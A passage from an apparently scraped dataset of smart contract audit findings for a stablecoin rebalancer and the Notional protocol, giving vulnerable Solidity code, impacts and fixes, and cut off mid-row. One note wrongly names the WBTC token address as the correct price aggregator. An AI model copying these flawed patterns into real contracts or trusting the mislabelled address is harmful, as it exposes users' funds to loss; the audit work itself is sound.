StableOracleWBTC contract responsible for retrieving the price of WBTC using the BTC/USD Chainlink oracle:\\n```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n\\nNB: key to note that the above pricefeed is set to the wrong aggregator, the correct one is this: `0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599`чTo mitigate the vulnerability mentioned above, it is strongly recommended to implement a double oracle setup for WBTC pricing. This setup would involve integrating both the BTC/USD Chainlink oracle and an additional on-chain liquidity-based oracle, such as UniV3 TWAP.\\nThe double oracle setup serves two primary purposes. Firstly, it reduces the risk of price manipulation by relying on the Chainlink oracle, which ensures accurate pricing for WBTC. Secondly, incorporating an on-chain liquidity-based oracle acts as a safeguard against WBTC depegging. By monitoring the price derived from the liquidity-based oracle and comparing it to the Chainlink oracle's price, borrowing activities can be halted if the threshold deviation (e.g., 2% lower) is breached.\\nAdopting a double oracle setup enhances the protocol's stability and minimizes the risks associated with WBTC depegging. It ensures accurate valuation, reduces the accumulation of bad debt, and safeguards the protocol and its usersчShould the WBTC bridge become compromised or WBTC depeg from BTC, the protocol would face severe consequences. The protocol would be burdened with a substantial amount of bad debt stemming from outstanding loans secured by WBTC. Additionally, due to the protocol's reliance on the BTC/USD oracle, the issuance of loans against WBTC would persist even if its value has significantly deteriorated. This would lead to an escalation in bad debt, negatively impacting the protocol's financial stability and overall performance.ч```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n -Inaccurate collateral factor calculation due to missing collateral assetчmediumчThe function `collateralFactor()` in the smart contract calculates the collateral factor for the protocol but fails to account for the removal of certain collateral assets. As a result, the total value of the removed collateral assets is not included in the calculation, leading to an inaccurate collateral factor.\\nThe `collateralFactor()` function calculates the current collateral factor for the protocol. It iterates through each collateral asset in the system and calculates the total value of all collateral assets in USD.\\nFor each collateral asset, the function retrieves its balance and converts it to a USD value by multiplying it with the asset's price in USD obtained from the corresponding oracle. The balance is adjusted for the decimal precision of the asset. These USD values are accumulated to calculate the totalAssetsUSD.\\n```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n\\nHowever, when a collateral asset is removed from the collateral list, the `collateralFactor` function fails to account for its absence. This results in an inaccurate calculation of the collateral factor. Specifically, the totalAssetsUSD variable does not include the value of the removed collateral asset, leading to an underestimation of the total collateral value. The function `SellUSSDBuyCollateral()` in the smart contract is used for rebalancing. However, it relies on the `collateralFactor` calculation, which has been found to be inaccurate. The `collateralFactor` calculation does not accurately assess the portions of collateral assets to be bought or sold during rebalancing. This discrepancy can lead to incorrect rebalancing decisions and potentially impact the stability and performance of the protocol.\\n```\\n function removeCollateral(uint256 _index) public onlyControl {\\n collateral[_index] = collateral[collateral.length - 1];\\n collateral.pop();\\n }\\n```\\nчEnsure accurate calculations and maintain the integrity of the collateral factor metric in the protocol's risk management system.чAs a consequence, the reported collateral factor may be lower than it should be, potentially affecting the risk assessment and stability of the protocol.ч```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n -Inconsistency handling of DAI as collateral in the BuyUSSDSellCollateral functionчmediumчDAI is the base asset of the `USSD.sol` contract, when a rebalacing needs to occur during a peg-down recovery, collateral is sold for DAI, which then is used to buy USSD in the DAI / USSD uniswap pool. Hence, when DAI is the collateral, this is not sold because there no existe a path to sell DAI for DAI.\\nThe above behavior is handled when collateral is about to be sold for DAI, see the comment `no need to swap DAI` (link to the code):\\n```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n\\nThe problem is in the `else branch` of the first if statement `collateralval > amountToBuyLeftUSD`, which lacks the check `if (collateral[i].pathsell.length > 0)`чHandle the case as is the done on the if branch of collateralval > amountToBuyLeftUSD:\\n```\\nif (collateral[i].pathsell.length > 0) {\\n // Sell collateral for DAI\\n}\\nelse {\\n // No need to swap DAI\\n}\\n```\\nчA re-balancing on a peg-down recovery will fail if the `collateralval` of DAI is less than `amountToBuyLeftUSD` but greater than `amountToBuyLeftUSD / 20` since the DAI collateral does not have a sell path.ч```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n -Risk of Incorrect Asset Pricing by StableOracle in Case of Underlying Aggregator Reaching minAnswerчmediumчChainlink aggregators have a built-in circuit breaker to prevent the price of an asset from deviating outside a predefined price range. This circuit breaker may cause the oracle to persistently return the minPrice instead of the actual asset price in the event of a significant price drop, as witnessed during the LUNA crash.\\nStableOracleDAI.sol, StableOracleWBTC.sol, and StableOracleWETH.sol utilize the ChainlinkFeedRegistry to fetch the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData extracts the linked aggregator and requests round data from it. If an asset's price falls below the minPrice, the protocol continues to value the token at the minPrice rather than its real value. This discrepancy could have the protocol end up minting drastically larger amount of stableCoinAmount as well as returning a much bigger collateral factor.\\nFor instance, if TokenA's minPrice is $1 and its price falls to $0.10, the aggregator continues to report $1, rendering the related function calls to entail a value that is ten times the actual value.\\nIt's important to note that while Chainlink oracles form part of the OracleAggregator system and the use of a combination of oracles could potentially prevent such a situation, there's still a risk. Secondary oracles, such as Band, could potentially be exploited by a malicious user who can DDOS relayers to prevent price updates. Once the price becomes stale, the Chainlink oracle's price would be the sole reference, posing a significant risk.чStableOracle should cross-check the returned answer against the minPrice/maxPrice and revert if the answer is outside of these bounds:\\n```\\n (, int256 price, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n if (price >= maxPrice or price <= minPrice) revert();\\n```\\n\\nThis ensures that a false price will not be returned if the underlying asset's value hits the minPrice.чIn the event of an asset crash (like LUNA), the protocol can be manipulated to handle calls at an inflated price.ч```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n -`BuyUSSDSellCollateral()` always sells 0 amount if need to sell part of collateralчmediumчDue to rounding error there is misbehaviour in `BuyUSSDSellCollateral()` function. It results in selling 0 amount of collateral.\\nSuppose the only collateral in protocol is 1 WBTC; 1 WBTC costs 30_000 USD; UniV3Pool DAI/ USSD has following liquidity: (3000e6 USSD, 2000e18 DAI) And also USSD is underpriced so call rebalance:\\n```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n\\nTake a look into BuyUSSDSellCollateral (follow comments):\\n```\\n function BuyUSSDSellCollateral(uint256 amountToBuy) internal { // 500e6\\n CollateralInfo[] memory collateral = IUSSD(USSD).collateralList();\\n //uint amountToBuyLeftUSD = amountToBuy * 1e12 * 1e6 / getOwnValuation();\\n uint amountToBuyLeftUSD = amountToBuy * 1e12; // 500e18\\n uint DAItosell = 0;\\n // Sell collateral in order of collateral array\\n for (uint256 i = 0; i < collateral.length; i++) {\\n // 30_000e18 = 1e8 * 1e18 / 10**8 * 30_000e18 / 1e18\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD); // 0\\n // amountToSellUnits = 1e8 * ((500e18 * 1e18 / 30_000e18) / 1e18) / 1e18 = 1e8 * (0) / 1e18 = 0\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n // and finally executes trade of 0 WBTC\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 = 0 - 0\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 += 0\\n // rest of code\\n```\\n\\nSo protocol will not buy DAI and will not sell DAI for USSD in UniswapV3Pool to support peg of USSD to DAIчRefactor formula of amountToSellUnits\\n```\\n// uint256 amountToSellUnits = (decimals of collateral) * (DAI amount to get for sell) / (price of 1 token of collateral)\\nuint256 amountToSellUnits = collateral[i].token).decimals() * amountToBuyLeftUSD / collateral[i].oracle.getPriceUSD()\\n```\\nчProtocol is not able of partial selling of collateral for token. It block algorithmic pegging of USSD to DAIч```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n -If collateral factor is high enough, flutter ends up being out of boundsчmediumчIn `USSDRebalancer` contract, function `SellUSSDBuyCollateral` will revert everytime a rebalance calls it, provided the collateral factor is greater than all the elements of the `flutterRatios` array.\\nFunction `SellUSSDBuyCollateral` calculates `flutter` as the lowest index of the `flutterRatios` array for which the collateral factor is smaller than the `flutter` ratio.\\n```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n\\nThe problem arises when, if collateral factor is greater than all flutter values, after the loop `flutter = flutterRatios.length`.\\nThis `flutter` value is used afterwards here:\\n```\\n// rest of code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n portions++;\\n}\\n// rest of code\\n```\\n\\nAnd here:\\n```\\n// rest of code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n}\\n// rest of code\\n```\\n\\nAs we can see in the tests of the project, the flutterRatios array and the collateral `ratios` array are set to be of the same length, so if flutter = flutterRatios.length, any call to that index in the `ratios` array will revert with an index out of bounds.чWhen checking `collateral[i].ratios[flutter]` always check first that flutter is `< flutterRatios.length`.чHigh, when the collateral factor reaches certain level, a rebalance that calls `SellUSSDBuyCollateral` will always revert.ч```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n -claimCOMPAndTransfer() COMP may be locked into the contractчhighчMalicious users can keep front-run `claimCOMPAndTransfer()` to trigger `COMPTROLLER.claimComp()` first, causing `netBalance` in `claimCOMPAndTransfer()` to be 0 all the time, resulting in `COMP` not being transferred out and locked in the contract\\n`claimCOMPAndTransfer()` use for \"Claims COMP incentives earned and transfers to the treasury manager contract\" The code is as follows:\\n```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n\\nFrom the above code, we can see that this method only turns out the difference value `netBalance` But `COMPTROLLER.claimComp()` can be called by anyone, if there is a malicious user front-run this transcation to triggers `COMPTROLLER.claimComp()` first This will cause thenetBalance to be 0 all the time, resulting in `COMP` not being transferred out and being locked in the contract.\\nThe following code is from `Comptroller.sol`\\n```\\n function claimComp(address holder, CToken[] memory cTokens) public { //<----------anyone can call it\\n address[] memory holders = new address[](1);\\n holders[0] = holder;\\n claimComp(holders, cTokens, true, true);\\n }\\n```\\nчTransfer all balances, not using `netBalance`ч`COMP` may be locked into the contractч```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n -repayAccountPrimeDebtAtSettlement() user lost residual cashчhighчin `repayAccountPrimeDebtAtSettlement()` Incorrect calculation of `primeCashRefund` value (always == 0) Resulting in the loss of the user's residual cash\\nwhen settle Vault Account will execute settleVaultAccount()->repayAccountPrimeDebtAtSettlement() In the `repayAccountPrimeDebtAtSettlement()` method the residual amount will be refunded to the user The code is as follows.\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n\\nFrom the above code we can see that there is a spelling error\\nnetPrimeDebtChange = accountPrimeStorageValue;\\nprimeCashRefund = netPrimeDebtChange.sub(accountPrimeStorageValue) so primeCashRefund always ==0\\nshould be `primeCashRefund = netPrimeDebtRepaid - accountPrimeStorageValue`ч```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n- pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n+ pr.convertDebtStorageToUnderlying(netPrimeDebtRepaid.sub(accountPrimeStorageValue)) \\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\nч`primeCashRefund` always == 0 , user lost residual cashч```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n -`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurelyчhighч`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurely during liquidation\\nIf both the `accountDebtOne` and `accountDebtTwo` of secondary currencies are zero, Notional will consider both debt shares to be cleared to zero, and the maturity will be cleared as well as shown below.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n\\n`VaultLiquidationAction.deleverageAccount` function\\nWithin the `VaultLiquidationAction.deleverageAccount` function, it will call the `_reduceAccountDebt` function.\\nReferring to the `_reduceAccountDebt` function below. Assume that the `currencyIndex` reference to a secondary currency. In this case, the else logic in Line 251 will be executed. An important point to take note of that is critical to understand this bug is that only ONE of the prime rates will be set as it assumes that the other prime rate will not be used (Refer to Line 252 - 255). However, this assumption is incorrect.\\nAssume that the `currencyIndex` is `1`. Then `netUnderlyingDebtOne` parameter will be set to a non-zero value (depositUnderlyingInternal) at Line 261 while `netUnderlyingDebtTwo` parameter will be set to zero at Line 262. This is because, in Line 263 of the `_reduceAccountDebt` function, the `pr[0]` will be set to the prime rate, while the `pr[1]` will be zero or empty. It will then proceed to call the `VaultSecondaryBorrow.updateAccountSecondaryDebt`\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nWithin the `updateAccountSecondaryDebt` function, at Line 272, assume that `accountStorage.accountDebtTwo` is `100`. However, since `pr[1]` is not initialized, the `VaultStateLib.readDebtStorageToUnderlying` will return a zero value and set the `accountDebtTwo` to zero.\\nAssume that the liquidator calls the `deleverageAccount` function to clear all the debt of the `currencyIndex` secondary currency. Line 274 will be executed, and `accountDebtOne` will be set to zero.\\nNote that at this point, both `accountDebtOne` and `accountDebtTwo` are zero. At Line 301, the `_setAccountMaturity` will set the `accountStorage.maturity = 0` , which clears the vault account's maturity.\\nAn important point here is that the liquidator did not clear the `accountDebtTwo`. Yet, `accountDebtTwo` became zero in memory during the execution and caused Notional to wrongly assume that both debt shares had been cleared to zero.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function updateAccountSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 maturity,\\n int256 netUnderlyingDebtOne,\\n int256 netUnderlyingDebtTwo,\\n PrimeRate[2] memory pr,\\n bool checkMinBorrow\\n ) internal {\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n // Check maturity\\n uint256 accountMaturity = accountStorage.maturity;\\n require(accountMaturity == maturity || accountMaturity == 0);\\n \\n int256 accountDebtOne = VaultStateLib.readDebtStorageToUnderlying(pr[0], maturity, accountStorage.accountDebtOne); \\n int256 accountDebtTwo = VaultStateLib.readDebtStorageToUnderlying(pr[1], maturity, accountStorage.accountDebtTwo);\\n if (netUnderlyingDebtOne != 0) {\\n accountDebtOne = accountDebtOne.add(netUnderlyingDebtOne);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[0], maturity, netUnderlyingDebtOne, pr[0]\\n );\\n\\n accountStorage.accountDebtOne = VaultStateLib.calculateDebtStorage(pr[0], maturity, accountDebtOne)\\n .neg().toUint().toUint80();\\n }\\n\\n if (netUnderlyingDebtTwo != 0) {\\n accountDebtTwo = accountDebtTwo.add(netUnderlyingDebtTwo);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[1], maturity, netUnderlyingDebtTwo, pr[1]\\n );\\n\\n accountStorage.accountDebtTwo = VaultStateLib.calculateDebtStorage(pr[1], maturity, accountDebtTwo)\\n .neg().toUint().toUint80();\\n }\\n\\n if (checkMinBorrow) {\\n // No overflow on negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, \"min borrow\");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, \"min borrow\");\\n }\\n\\n _setAccountMaturity(accountStorage, accountDebtOne, accountDebtTwo, maturity.toUint40());\\n }\\n```\\n\\nThe final state will be `VaultAccountSecondaryDebtShareStorage` as follows:\\n`maturity` and `accountDebtOne` are zero\\n`accountDebtTwo` = 100\\n```\\nstruct VaultAccountSecondaryDebtShareStorage {\\n // Maturity for the account's secondary borrows. This is stored separately from\\n // the vault account maturity to ensure that we have access to the proper state\\n // during a roll borrow position. It should never be allowed to deviate from the\\n // vaultAccount.maturity value (unless it is cleared to zero).\\n uint40 maturity;\\n // Account debt for the first secondary currency in either fCash or pCash denomination\\n uint80 accountDebtOne;\\n // Account debt for the second secondary currency in either fCash or pCash denomination\\n uint80 accountDebtTwo;\\n}\\n```\\n\\nFirstly, it does not make sense to have `accountDebtTwo` but no `maturity` in storage, which also means the vault account data is corrupted. Secondly, when `maturity` is zero, it also means that the vault account did not borrow anything from Notional. Lastly, many vault logic would break since it relies on the `maturity` value.\\n`VaultLiquidationAction.liquidateVaultCashBalance` function\\nThe root cause lies in the implementation of the `_reduceAccountDebt` function. Since `liquidateVaultCashBalance` function calls the `_reduceAccountDebt` function to reduce the debt of the vault account being liquidated, the same issue will occur here.чFetch the prime rate of both secondary currencies because they are both needed within the `updateAccountSecondaryDebt` function when converting debt storage to underlying.\\n```\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n// Remove the line below\\n pr[currencyIndex // Remove the line below\\n 1] = primeRate;\\n// Add the line below\\n pr = VaultSecondaryBorrow.getSecondaryPrimeRateStateful(vaultConfig);\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 